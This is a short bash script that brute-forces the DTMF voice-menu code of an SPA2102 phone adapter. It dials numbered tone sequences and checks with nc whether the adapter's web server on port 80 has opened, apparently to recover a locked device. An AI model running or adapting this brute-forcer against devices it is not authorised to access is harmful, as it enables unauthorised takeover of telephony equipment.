#
# DTMF bruteforcer for SPA2102, written by Tore Sinding Bekkedal
# 

TONE_TIME=40
START_NUM=0
END_NUM=100000
SPA_IP=10.0.0.4

echo -n "Beginning scan from $START_NUM to $END_NUM"

for num in $(seq $START_NUM $END_NUM); do
	if (echo $num | grep -q 0$ - ); then 
		BEFORE_TIME=$(date +%s)
		# To prevent invocation of dtmfdial if a '1' has been present
		# in the entire batch.
		if [ -n "$STRING" ]; then
			dtmfdial --tone-time $TONE_TIME '****'$STRING
		fi
		AFTER_TIME=$(date +%s);	TIME=$(( $AFTER_TIME-$BEFORE_TIME ))
	
		STRING=""

		printf " (%03d s)..." $TIME

		if (echo $num | grep -q 00$ - ); then 
			echo -n "(web server check)..."
			if nc -z $SPA_IP 80; then
				echo -e '\n'COMBINATION HAS BEEN FOUND'!'
				# fanfare must be supplied by user ;)
				mplayer -volume 100 -loop 0 fanfare.mp3
				exit
			fi
		fi
		echo
	fi

	# Check if the number contains a '1'.
	if (echo $num | grep -q 1 -); then
		# Unlike all other digits, the digit 1 only represents itself,
		# so we skip it, because it's much less bang for the buck.
		# If we reach a point where it's likely that we missed a 1,
		# we can go back and do only the 1s. 
		printf "%09d " $num 
	else
		# The overhead of invoking dtmfdial is quite significant,
		# so we save some time by just constructing a string cache,
		# and purging it every 10 numbers.
		STRING=$STRING"7932#$num#1#1#"
		printf "%09d " $num 
	fi
done